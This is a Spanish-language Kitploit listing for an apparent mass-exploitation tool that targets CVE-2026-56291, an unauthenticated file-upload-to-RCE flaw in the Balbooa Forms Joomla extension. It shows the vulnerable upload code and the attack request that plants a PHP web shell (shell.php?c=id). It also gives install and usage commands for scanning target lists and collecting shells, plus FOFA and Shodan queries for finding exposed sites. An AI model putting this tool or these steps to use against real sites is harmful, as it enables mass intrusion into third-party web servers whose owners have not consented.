Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — Subida de archivos no autenticada a RCE mediante form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
Herramientas/GitHubGitHub/shinthink/cve-2026-56291
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — Subida de archivos no autenticada a RCE mediante form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

Ver Repositorio
2hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-56291 — Exploit RCE Masivo de Balbooa Forms para Joomla

Pre-Auth form.uploadAttachmentFile → Sin CSRF → Subida PHP


Resumen

CVE-2026-56291 es una vulnerabilidad crítica (CVSS 9.8) de subida arbitraria de archivos sin autenticación en la extensión de Joomla Balbooa Forms (com_baforms) (< 2.4.1).

La tarea frontend form.uploadAttachmentFile no llama a Session::checkToken() ni realiza ninguna comprobación de permisos. Los archivos subidos utilizan directamente la extensión del atacante: $fileName = $name . '.' . $ext. Los archivos se guardan en images/baforms/uploads/form-{id}/ — directamente ejecutables como PHP.

Versiones Afectadas

VersiónEstado
1.0 – 2.4.0Vulnerable
2.4.1+Parcheada

CISA KEV: Añadido el 10 de julio de 2026 — explotación activa confirmada.


Mecanismo de la Vulnerabilidad

Causa Raíz

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

Flujo del Ataque

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

Instalación

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

Uso

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

Referencias

RecursoEnlace
CISA KEVcisa.gov/known-exploited-vulnerabilities
Detalles del Parchemysites.guru
InvestigadorPhil Taylor

No afiliado con Balbooa.

Descargar herramienta